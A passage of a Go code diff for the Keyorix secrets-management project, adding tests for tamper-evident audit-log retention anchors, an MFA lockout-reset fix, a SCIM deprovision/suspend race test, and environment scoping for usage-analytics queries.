+	_, err := c.PurgeAuditLogs(ctx, AuditLogRetentionConfig{RetentionDays: 30})
+	require.NoError(t, err)
+
+	cp, written, err := c.WriteAuditCheckpoint(ctx)
+	require.NoError(t, err, "checkpointing must recover after a sanctioned purge, not stay permanently refused")
+	require.True(t, written)
+	require.NotNil(t, cp)
+	assert.Equal(t, int64(3), cp.ChainedEvents, "2 surviving user events + the system.audit_purge event")
+}
+
+// TestPurgeAuditLogs_AttackerDeletesAnchoredRow_StillDetected proves the fix
+// does not weaken tamper detection: after a legitimate purge establishes an
+// anchor at row N, a DB-level actor deleting row N itself (going further than
+// any sanctioned purge did, without a fresh anchor covering the new gap) must
+// still be caught, not silently absorbed by the existing anchor.
+func TestPurgeAuditLogs_AttackerDeletesAnchoredRow_StillDetected(t *testing.T) {
+	ctx := context.Background()
+	c, db, fixed := newReanchorTestCore(t)
+
+	for i := 0; i < 3; i++ {
+		logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -(40+i)))
+	}
+	survivor1 := logChainedEvent(t, c, "secret.updated", fixed.AddDate(0, 0, -1))
+	logChainedEvent(t, c, "secret.updated", fixed.AddDate(0, 0, -1))
+
+	_, err := c.PurgeAuditLogs(ctx, AuditLogRetentionConfig{RetentionDays: 30})
+	require.NoError(t, err)
+
+	// Confirm the purge legitimately re-anchored (chain verifies).
+	v, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	require.True(t, v.Valid, "sanity: purge alone must not break verification")
+
+	// Attack: delete the anchored row directly (bypassing PurgeAuditLogs and its
+	// re-anchor step entirely) — simulating a malicious insider or an actor with
+	// raw DB access removing more than any sanctioned purge authorized.
+	require.NoError(t, db.Delete(&models.AuditEvent{}, survivor1.ID).Error)
+
+	v2, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.False(t, v2.Valid, "deleting the anchored row outside a sanctioned purge must still be detected")
+	assert.Contains(t, v2.Reason, "re-anchor")
+}
+
+// TestVerifyAuditChain_ForgedRetentionAnchorRejected proves the anchor is
+// authenticated, not a plain trusted marker: a DB-level actor who deletes
+// chained rows and forges a plausible-looking (but unsigned/incorrectly signed)
+// retention-anchor system_metadata row — attempting to make an unsanctioned gap
+// look like a legitimate purge — must NOT have that anchor accepted. Without
+// the checkpoint signing key (held only in this process's memory), the forged
+// signature cannot verify, so the anchor is ignored and the walk correctly
+// reports the chain broken, exactly as if no anchor existed.
+func TestVerifyAuditChain_ForgedRetentionAnchorRejected(t *testing.T) {
+	ctx := context.Background()
+	c, db, fixed := newReanchorTestCore(t)
+
+	var ids []uint
+	for i := 0; i < 5; i++ {
+		e := logChainedEvent(t, c, "secret.read", fixed.AddDate(0, 0, -i))
+		ids = append(ids, e.ID)
+	}
+
+	// No PurgeAuditLogs call at all — this is unsanctioned, raw deletion.
+	require.NoError(t, db.Where("id IN ?", ids[:3]).Delete(&models.AuditEvent{}).Error)
+
+	var survivingHead models.AuditEvent
+	require.NoError(t, db.Order("id ASC").First(&survivingHead).Error)
+	require.Equal(t, ids[3], survivingHead.ID)
+
+	// Forge an anchor claiming this gap is a legitimate re-anchor point, but
+	// signed with a key the attacker does not actually have (a wrong/garbage
+	// signature, as any DB-only actor would be forced to produce).
+	forged := auditRetentionAnchorValue(survivingHead.ID, survivingHead.PrevHash, survivingHead.EntryHash, "v1", "0000forged0000signature0000")
+	require.NoError(t, c.storage.SetSystemMetadata(ctx, auditRetentionAnchorKey, forged))
+
+	v, err := c.VerifyAuditChain(ctx)
+	require.NoError(t, err)
+	assert.False(t, v.Valid, "a forged retention anchor must not be trusted to paper over an unsanctioned deletion")
+	require.NotNil(t, v.FirstBrokenID)
+	assert.Equal(t, survivingHead.ID, *v.FirstBrokenID)
+}

--- a/internal/core/audit_retention_test.go
+++ b/internal/core/audit_retention_test.go
@@ -58,7 +58,7 @@ func TestAuditRetentionCoverage_YoungDeployment(t *testing.T) {
 func TestVerifyAuditChain_PassesThrough(t *testing.T) {
 	brokenID := uint(42)
 	store := new(MockStorage)
-	store.On("VerifyAuditChain", mock.Anything).Return(&storage.AuditChainVerification{
+	store.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(&storage.AuditChainVerification{
 		Valid: false, ChainedEvents: 41, FirstBrokenID: &brokenID, Reason: "event modified",
 	}, nil)
 
@@ -118,11 +118,16 @@ func TestAuditRetentionCoverage_FutureOldest(t *testing.T) {
 // enforceAuditHighWater).
 func TestVerifyAuditChain_CheckpointEnforceError(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(&storage.AuditChainVerification{
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(&storage.AuditChainVerification{
 		Valid: true, ChainedEvents: 5,
 	}, nil)
+	// The retention-anchor lookup (loadAuditRetentionAnchor) also reads
+	// GetSystemMetadata, ahead of the raw walk — give it a clean "no anchor" so
+	// this test still isolates the high-water read's failure inside
+	// enforceAuditHighWater, not an earlier one.
+	ms.On("GetSystemMetadata", mock.Anything, auditRetentionAnchorKey).Return("", false, nil)
 	// GetSystemMetadata is called by auditHighWaterFloor inside enforceAuditHighWater.
-	ms.On("GetSystemMetadata", mock.Anything, mock.Anything).
+	ms.On("GetSystemMetadata", mock.Anything, auditHighWaterKey).
 		Return("", false, errors.New("metadata store unavailable"))
 
 	c := NewKeyorixCore(ms)

--- a/internal/core/auth.go
+++ b/internal/core/auth.go
@@ -116,15 +116,22 @@ func (c *KeyorixCore) VerifyPasswordCredentials(ctx context.Context, username, p
 		c.recordFailedLogin(ctx, user) // increment + lock at the threshold
 		return nil, fmt.Errorf("invalid credentials")
 	}
-	// Correct password — but a concurrent burst of failed attempts against this
-	// account may have tripped the lock between the snapshot read at the top of
-	// this function and now (TOCTOU). Re-check the lock state under the same
-	// serialization recordFailedLogin uses (the account's mutex shard + a Postgres
-	// row lock) before minting a session, and only then clear any accumulated
-	// failure state — never trust the stale pre-bcrypt snapshot alone.
-	if err := c.checkLockAndClearLoginFailures(ctx, user); err != nil {
-		return nil, err
-	}
+	// Correct password — but this is only PARTIAL authentication when the account
+	// has a second factor configured (MFAEnabled/WebAuthnEnabled): Login refuses to
+	// mint a session at this point and instead returns ErrMFARequired, deferring to
+	// CreateMFAChallenge -> VerifyMFALogin (or the WebAuthn assertion ceremony).
+	// Deliberately do NOT clear the accumulated lockout state here: this function
+	// has no visibility into whether a second factor is required (that gate lives
+	// in the caller, Login), so clearing unconditionally would let an attacker who
+	// merely knows the correct password — without ever passing MFA — repeatedly
+	// reset the account's failed-login counter/lock, defeating the lockout as a
+	// brute-force backstop and even undoing a defender-triggered lock. The
+	// TOCTOU-safe recheck-and-clear (checkLockAndClearLoginFailures) instead
+	// happens at the ACTUAL full-authentication point for each login path: Login
+	// itself, immediately before mintSession, when no second factor is required;
+	// VerifyMFALogin and the WebAuthn Finish* functions, immediately before their
+	// own mintSession, when one is. Every login path ends up covered exactly once,
+	// at the point it is truly done authenticating — never earlier.
 	// A deactivated account (IsActive=false — e.g. admin deactivation via UpdateUser,
 	// or a SCIM/IdP deactivation) is refused login regardless of account_state. The
 	// state-based gate below does not cover this, so without it a deactivated user who
@@ -184,8 +191,24 @@ func (c *KeyorixCore) Login(ctx context.Context, req *LoginRequest) (*models.Ses
 	// Accounts with any second factor (TOTP or a passkey) get no session from the
 	// password step — the caller must complete it (CreateMFAChallenge →
 	// VerifyMFALogin for TOTP, or the WebAuthn assertion ceremony for a passkey).
+	// Critically, the lockout counter is NOT cleared on this branch: a correct
+	// password alone is not full authentication for these accounts, so an
+	// attacker who knows the password but lacks the second factor must not be
+	// able to reset the account's brute-force lockout state (VerifyMFALogin /
+	// the WebAuthn Finish* functions each do their own clear once the second
+	// factor actually succeeds).
 	if user.MFAEnabled || user.WebAuthnEnabled {
 		return nil, user, ErrMFARequired
+	}
+	// No second factor configured — the password step IS the full authentication.
+	// Re-check the lock state under the same serialization recordFailedLogin uses
+	// (the account's mutex shard + a Postgres row lock) before minting a session,
+	// and only then clear any accumulated failure state: a concurrent burst of
+	// failed attempts against this account may have tripped the lock between the
+	// snapshot read inside VerifyPasswordCredentials and now (TOCTOU) — never
+	// trust that stale snapshot alone.
+	if err := c.checkLockAndClearLoginFailures(ctx, user); err != nil {
+		return nil, nil, err
 	}
 	created, err := c.mintSession(ctx, user.ID, req.UserAgent, req.IPAddress)
 	if err != nil {

--- a/internal/core/compliance_evidence_test.go
+++ b/internal/core/compliance_evidence_test.go
@@ -63,7 +63,7 @@ func TestGenerateComplianceEvidence_DegradesOnRotationOverdueQueryError(t *testi
 // #362: campaigns, per project — models.AccessReviewCampaign deliberately not migrated.
 func TestGenerateComplianceEvidence_DegradesOnCampaignsQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.BreakGlassActivation{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}, &models.AuditEvent{}))
 
 	ev, err := c.GenerateComplianceEvidence(context.Background())
 	require.NoError(t, err)
@@ -79,7 +79,7 @@ func TestGenerateComplianceEvidence_DegradesOnCampaignsQueryError(t *testing.T) 
 // activation is the most severe of this family.
 func TestGenerateComplianceEvidence_DegradesOnBreakGlassQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}, &models.AuditEvent{}))
 
 	ev, err := c.GenerateComplianceEvidence(context.Background())
 	require.NoError(t, err)

--- a/internal/core/compliance_posture_test.go
+++ b/internal/core/compliance_posture_test.go
@@ -224,7 +224,7 @@ func TestGetCompliancePosture_DegradedOnClassificationCountQueryErrors(t *testin
 // dropped from ProjectsNeverReviewed/ProjectsWithOpenCampaign/PendingItems/ProjectsOverdue.
 func TestGetCompliancePosture_DegradedOnAccessReviewCampaignsQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.BreakGlassActivation{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}, &models.AuditEvent{}))
 	// models.AccessReviewCampaign deliberately NOT migrated.
 
 	p, err := c.GetCompliancePosture(context.Background())
@@ -239,7 +239,7 @@ func TestGetCompliancePosture_DegradedOnAccessReviewCampaignsQueryError(t *testi
 // emergency access from the report.
 func TestGetCompliancePosture_DegradedOnBreakGlassQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}, &models.AuditEvent{}))
 	// models.BreakGlassActivation deliberately NOT migrated.
 
 	p, err := c.GetCompliancePosture(context.Background())

--- a/internal/core/compliance_posture_test.go
+++ b/internal/core/compliance_posture_test.go
@@ -268,7 +268,7 @@ func TestGetCompliancePosture_DegradedOnDormantRoleGrantsAssignmentsQueryError(t
 
 func TestGetCompliancePosture_DegradedOnDormantRoleGrantsActivityQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.Group{}))
 	// models.AuditEvent deliberately NOT migrated → LastUserSecretReadActivity's raw
 	// "audit_events" table query fails (the first of the two plain-tier per-
 	// permission activity queries countDormantRoleGrants runs, #487 round 112).
@@ -298,7 +298,7 @@ func (s *failingSecretWriteActivityStore) LastUserSecretWriteActivity(_ context.
 // standing access) on a storage error.
 func TestGetCompliancePosture_DegradedOnDormantRoleGrantsWriteActivityQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}, &models.Group{}))
 	c.storage = &failingSecretWriteActivityStore{LocalStorage: c.storage.(*store.LocalStorage)}
 
 	p, err := c.GetCompliancePosture(context.Background())
@@ -326,7 +326,7 @@ func (s *failingRoleManagementActivityStore) LastUserRoleManagementActivity(_ co
 // privileged access) on a storage error.
 func TestGetCompliancePosture_DegradedOnDormantRoleGrantsRoleManagementActivityQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}, &models.Group{}))
 	c.storage = &failingRoleManagementActivityStore{LocalStorage: c.storage.(*store.LocalStorage)}
 
 	p, err := c.GetCompliancePosture(context.Background())
@@ -349,7 +349,7 @@ func (s *failingSecretsDeletionActivityStore) LastUserSecretDeletionActivity(_ c
 
 func TestGetCompliancePosture_DegradedOnDormantRoleGrantsSecretsDeletionActivityQueryError(t *testing.T) {
 	c, db := compliancePostureCoreWithProject(t)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.BreakGlassActivation{}, &models.UserRole{}, &models.GroupRole{}, &models.AuditEvent{}, &models.Group{}))
 	c.storage = &failingSecretsDeletionActivityStore{LocalStorage: c.storage.(*store.LocalStorage)}
 
 	p, err := c.GetCompliancePosture(context.Background())

--- a/internal/core/concurrency_access_review_campaign_close_test.go
+++ b/internal/core/concurrency_access_review_campaign_close_test.go
@@ -35,7 +35,7 @@ func TestConcurrency_DecideAccessReviewItem_RejectsWhenRacingClose(t *testing.T)
 	dsn := "file:" + filepath.Join(t.TempDir(), "arc-close-race.db") + "?_busy_timeout=10000&_journal_mode=WAL&_txlock=immediate"
 	db, err := gorm.Open(sqlite.Open(dsn), &gorm.Config{})
 	require.NoError(t, err)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}, &models.Group{}))
 
 	const proj = uint(2)
 	campaign := &models.AccessReviewCampaign{ProjectID: proj, Name: "close-race", State: core.CampaignStateOpen}

--- a/internal/core/concurrency_access_review_redecide_test.go
+++ b/internal/core/concurrency_access_review_redecide_test.go
@@ -32,7 +32,7 @@ func TestConcurrency_DecideAccessReviewItem_OnlyOneDecisionWins(t *testing.T) {
 	dsn := "file:" + filepath.Join(t.TempDir(), "arc.db") + "?_busy_timeout=10000&_journal_mode=WAL&_txlock=immediate"
 	db, err := gorm.Open(sqlite.Open(dsn), &gorm.Config{})
 	require.NoError(t, err)
-	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}))
+	require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}, &models.Group{}))
 
 	const proj = uint(2)
 	campaign := &models.AccessReviewCampaign{ProjectID: proj, Name: "race", State: core.CampaignStateOpen}

--- a/internal/core/concurrency_deprovision_suspend_race_test.go
+++ b/internal/core/concurrency_deprovision_suspend_race_test.go
@@ -1,0 +1,106 @@
+package core_test
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"sync"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/storage/sqlitedialect"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+	"gorm.io/gorm"
+
+	"github.com/keyorixhq/keyorix/internal/core"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/storage/store"
+)
+
+// TestConcurrency_DeprovisionSCIMUser_DoesNotRevertConcurrentSuspend is the regression
+// for the residual stale-struct-overwrite bug in DeprovisionSCIMUser (SCIM DELETE):
+// unlike scimUpdateUserTx/setAccountState — which both re-read the row via
+// LockUserForUpdate INSIDE the critical section, immediately before the write — this
+// function used to capture its working copy via a plain, UNLOCKED c.storage.GetUser
+// call BEFORE acquiring accountStateMu (the #G03 fix), then reused that same
+// now-possibly-stale struct for its final tx.UpdateUser call after the lock. A
+// concurrent SuspendUser call (setAccountState) that committed its own account_state
+// write in the window between that initial unlocked read and DeprovisionSCIMUser's
+// later locked write got silently reverted back to AccountDeprovisioned by
+// DeprovisionSCIMUser's blind write of the stale struct — with SuspendUser itself
+// reporting success and no error surfaced to either caller.
+//
+// Mirrors TestConcurrency_SuspendUser_SurvivesConcurrentSCIMResync's rigor (many
+// distinct users, each with its own SuspendUser/DeprovisionSCIMUser pair, ALL released
+// from a single start barrier at once on a real, file-backed SQLite DB) for this
+// narrower shape of the same #344 race family — narrower because DeprovisionSCIMUser
+// always ends by soft-deleting the row regardless of who "wins", so the row must be
+// read via Unscoped() to observe the persisted account_state afterward, and a
+// SuspendUser call that lost the race outright (the row was already gone by the time
+// it tried to lock it) is excluded from the assertion — that ordering is a clean
+// "too late" error, not silent corruption.
+func TestConcurrency_DeprovisionSCIMUser_DoesNotRevertConcurrentSuspend(t *testing.T) {
+	dsn := "file:" + filepath.Join(t.TempDir(), "deprovision_suspend_race.db") + "?_busy_timeout=10000&_journal_mode=WAL&_txlock=immediate"
+	db, err := gorm.Open(sqlite.Open(dsn), &gorm.Config{})
+	require.NoError(t, err)
+	require.NoError(t, db.AutoMigrate(
+		&models.User{}, &models.Session{}, &models.AuditEvent{}, &models.PersonalAccessToken{},
+		&models.Role{}, &models.UserRole{}, &models.Project{}, &models.Environment{},
+		// Group/UserGroup/GroupRole are needed by guardLastAdminDeactivation (#G02),
+		// which both SuspendUser and DeprovisionSCIMUser call.
+		&models.Group{}, &models.UserGroup{}, &models.GroupRole{},
+	))
+
+	c := core.NewKeyorixCore(store.NewLocalStorage(db))
+	ctx := context.Background()
+
+	const users = 200 // many concurrent (suspend, SCIM-deprovision) pairs racing at once
+	for i := 0; i < users; i++ {
+		require.NoError(t, db.Create(&models.User{
+			ID: uint(i + 1), Username: fmt.Sprintf("user%d", i), Email: fmt.Sprintf("user%d@x.io", i),
+			IsActive: true, AccountState: core.AccountActive, ExternalID: fmt.Sprintf("okta|user%d", i),
+		}).Error)
+	}
+
+	suspendErrs := make([]error, users)
+	start := make(chan struct{})
+	var wg sync.WaitGroup
+	for i := 0; i < users; i++ {
+		uid := uint(i + 1)
+		idx := i
+		wg.Add(2)
+		go func() {
+			defer wg.Done()
+			<-start
+			suspendErrs[idx] = c.SuspendUser(ctx, 99, uid) // admin incident response
+		}()
+		go func() {
+			defer wg.Done()
+			<-start
+			_ = c.DeprovisionSCIMUser(ctx, 2, uid) // routine IdP DELETE
+		}()
+	}
+	close(start) // release every pair at once
+	wg.Wait()
+
+	var reverted []uint
+	for i := 0; i < users; i++ {
+		uid := uint(i + 1)
+		if suspendErrs[i] != nil {
+			// SuspendUser lost the race outright — the row was already soft-deleted
+			// before it could even lock it. A clean "too late" error, not the bug
+			// this test targets.
+			continue
+		}
+		var got models.User
+		// Unscoped: DeprovisionSCIMUser soft-deletes the row regardless of outcome,
+		// but the persisted account_state must still reflect the successful suspend.
+		require.NoError(t, db.Unscoped().First(&got, uid).Error)
+		if got.AccountState != core.AccountSuspended {
+			reverted = append(reverted, uid)
+		}
+	}
+	assert.Empty(t, reverted,
+		"SuspendUser reported success but a concurrent DeprovisionSCIMUser silently reverted "+
+			"the suspension back to deprovisioned for these users: %v", reverted)
+}

--- a/internal/core/concurrency_g04_threshold_race_test.go
+++ b/internal/core/concurrency_g04_threshold_race_test.go
@@ -108,7 +108,7 @@ func TestConcurrency_DecideAccessReviewItem_AttestRevokeRace(t *testing.T) {
 	const trials = 30
 	for trial := 0; trial < trials; trial++ {
 		db := openRaceDB(t, fmt.Sprintf("arc_mixed_%d", trial))
-		require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}))
+		require.NoError(t, db.AutoMigrate(&models.AccessReviewCampaign{}, &models.AccessReviewItem{}, &models.AuditEvent{}, &models.UserRole{}, &models.GroupRole{}, &models.Group{}))
 
 		const proj = uint(2)
 		campaign := &models.AccessReviewCampaign{ProjectID: proj, Name: "race", State: core.CampaignStateOpen}

--- a/internal/core/core_s24_test.go
+++ b/internal/core/core_s24_test.go
@@ -764,47 +764,63 @@ func TestMostAccessedSecrets_DefaultsApplied(t *testing.T) {
 	ms := new(MockStorage)
 	// Expect defaults: days=30, limit=10
 	stats := []storage.SecretUsageStat{{SecretID: 1, SecretName: "db-pass", ReadCount: 42}}
-	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), mock.AnythingOfType("time.Time"), 10).Return(stats, nil)
+	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), (*uint)(nil), mock.AnythingOfType("time.Time"), 10).Return(stats, nil)
 	c := NewKeyorixCore(ms)
-	got, err := c.MostAccessedSecrets(context.Background(), nil, 0, 0)
+	got, err := c.MostAccessedSecrets(context.Background(), nil, nil, 0, 0)
 	require.NoError(t, err)
 	assert.Len(t, got, 1)
 }
 
 func TestMostAccessedSecrets_LimitCapped(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), mock.AnythingOfType("time.Time"), 100).Return([]storage.SecretUsageStat{}, nil)
+	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), (*uint)(nil), mock.AnythingOfType("time.Time"), 100).Return([]storage.SecretUsageStat{}, nil)
 	c := NewKeyorixCore(ms)
-	_, err := c.MostAccessedSecrets(context.Background(), nil, 7, 9999)
+	_, err := c.MostAccessedSecrets(context.Background(), nil, nil, 7, 9999)
 	require.NoError(t, err)
 	ms.AssertExpectations(t)
 }
 
 func TestMostAccessedSecrets_StorageError(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), mock.AnythingOfType("time.Time"), 10).Return(nil, errors.New("query failed"))
+	ms.On("MostAccessedSecrets", mock.Anything, (*uint)(nil), (*uint)(nil), mock.AnythingOfType("time.Time"), 10).Return(nil, errors.New("query failed"))
 	c := NewKeyorixCore(ms)
-	_, err := c.MostAccessedSecrets(context.Background(), nil, 0, 0)
+	_, err := c.MostAccessedSecrets(context.Background(), nil, nil, 0, 0)
 	require.Error(t, err)
 	assert.Contains(t, err.Error(), "most-accessed")
+}
+
+// TestMostAccessedSecrets_WithEnvironmentScope confirms the environmentID
+// argument (added to close the scope-widening leak where the HTTP handler
+// ignored environment_id and always returned the whole project's aggregate)
+// is threaded through to the storage layer unchanged.
+func TestMostAccessedSecrets_WithEnvironmentScope(t *testing.T) {
+	ms := new(MockStorage)
+	pid := uint(5)
+	eid := uint(9)
+	ms.On("MostAccessedSecrets", mock.Anything, &pid, &eid, mock.AnythingOfType("time.Time"), 10).Return([]storage.SecretUsageStat{{SecretID: 1}}, nil)
+	c := NewKeyorixCore(ms)
+	got, err := c.MostAccessedSecrets(context.Background(), &pid, &eid, 0, 0)
+	require.NoError(t, err)
+	assert.Len(t, got, 1)
+	ms.AssertExpectations(t)
 }
 
 // ── usage_analytics.go — UnusedSecrets ───────────────────────────────────────
 
 func TestUnusedSecrets_DefaultsApplied(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("UnusedSecrets", mock.Anything, (*uint)(nil), mock.AnythingOfType("time.Time")).Return([]storage.UnusedSecretStat{}, nil)
+	ms.On("UnusedSecrets", mock.Anything, (*uint)(nil), (*uint)(nil), mock.AnythingOfType("time.Time")).Return([]storage.UnusedSecretStat{}, nil)
 	c := NewKeyorixCore(ms)
-	got, err := c.UnusedSecrets(context.Background(), nil, 0)
+	got, err := c.UnusedSecrets(context.Background(), nil, nil, 0)
 	require.NoError(t, err)
 	assert.Empty(t, got)
 }
 
 func TestUnusedSecrets_StorageError(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("UnusedSecrets", mock.Anything, (*uint)(nil), mock.AnythingOfType("time.Time")).Return(nil, errors.New("db err"))
+	ms.On("UnusedSecrets", mock.Anything, (*uint)(nil), (*uint)(nil), mock.AnythingOfType("time.Time")).Return(nil, errors.New("db err"))
 	c := NewKeyorixCore(ms)
-	_, err := c.UnusedSecrets(context.Background(), nil, 30)
+	_, err := c.UnusedSecrets(context.Background(), nil, nil, 30)
 	require.Error(t, err)
 	assert.Contains(t, err.Error(), "unused secrets")
 }
@@ -812,11 +828,25 @@ func TestUnusedSecrets_StorageError(t *testing.T) {
 func TestUnusedSecrets_WithProjectScope(t *testing.T) {
 	ms := new(MockStorage)
 	pid := uint(5)
-	ms.On("UnusedSecrets", mock.Anything, &pid, mock.AnythingOfType("time.Time")).Return([]storage.UnusedSecretStat{{SecretID: 3}}, nil)
+	ms.On("UnusedSecrets", mock.Anything, &pid, (*uint)(nil), mock.AnythingOfType("time.Time")).Return([]storage.UnusedSecretStat{{SecretID: 3}}, nil)
 	c := NewKeyorixCore(ms)
-	got, err := c.UnusedSecrets(context.Background(), &pid, 14)
+	got, err := c.UnusedSecrets(context.Background(), &pid, nil, 14)
 	require.NoError(t, err)
 	assert.Len(t, got, 1)
+}
+
+// TestUnusedSecrets_WithEnvironmentScope confirms the environmentID argument
+// is threaded through to the storage layer unchanged.
+func TestUnusedSecrets_WithEnvironmentScope(t *testing.T) {
+	ms := new(MockStorage)
+	pid := uint(5)
+	eid := uint(9)
+	ms.On("UnusedSecrets", mock.Anything, &pid, &eid, mock.AnythingOfType("time.Time")).Return([]storage.UnusedSecretStat{{SecretID: 3}}, nil)
+	c := NewKeyorixCore(ms)
+	got, err := c.UnusedSecrets(context.Background(), &pid, &eid, 14)
+	require.NoError(t, err)
+	assert.Len(t, got, 1)
+	ms.AssertExpectations(t)
 }
 
 // ── users.go — GetUser ────────────────────────────────────────────────────────

--- a/internal/core/core_s28_test.go
+++ b/internal/core/core_s28_test.go
@@ -336,7 +336,8 @@ func TestGenerateProjectAccessReview_ZeroProjectID(t *testing.T) {
 
 func TestWriteAuditCheckpointLocked_VerifyFails(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(nil, errors.New("db error"))
+	ms.On("GetSystemMetadata", mock.Anything, auditRetentionAnchorKey).Return("", false, nil)
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(nil, errors.New("db error"))
 	c := NewKeyorixCore(ms)
 	c.SetAuditCheckpointKey([]byte("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1"), "v1")
 	_, _, err := c.WriteAuditCheckpoint(context.Background())
@@ -350,7 +351,8 @@ func TestWriteAuditCheckpointLocked_VerifyFails(t *testing.T) {
 
 func TestWriteAuditCheckpointLocked_InvalidChain(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(&storage.AuditChainVerification{
+	ms.On("GetSystemMetadata", mock.Anything, auditRetentionAnchorKey).Return("", false, nil)
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(&storage.AuditChainVerification{
 		Valid:  false,
 		Reason: "chain broken at row 5",
 	}, nil)
@@ -373,7 +375,8 @@ func TestWriteAuditCheckpointLocked_InvalidChain(t *testing.T) {
 func TestWriteAuditCheckpointLocked_LookAlikeErrorNotSpoofed(t *testing.T) {
 	lookAlike := errors.New("driver: refusing to checkpoint transaction on connection 0x7f — connection reset by peer")
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(nil, lookAlike)
+	ms.On("GetSystemMetadata", mock.Anything, auditRetentionAnchorKey).Return("", false, nil)
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(nil, lookAlike)
 	c := NewKeyorixCore(ms)
 	c.SetAuditCheckpointKey([]byte("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1"), "v1")
 	_, _, err := c.WriteAuditCheckpoint(context.Background())
@@ -384,7 +387,8 @@ func TestWriteAuditCheckpointLocked_LookAlikeErrorNotSpoofed(t *testing.T) {
 
 func TestWriteAuditCheckpointLocked_ValidChain_NoExistingCP(t *testing.T) {
 	ms := new(MockStorage)
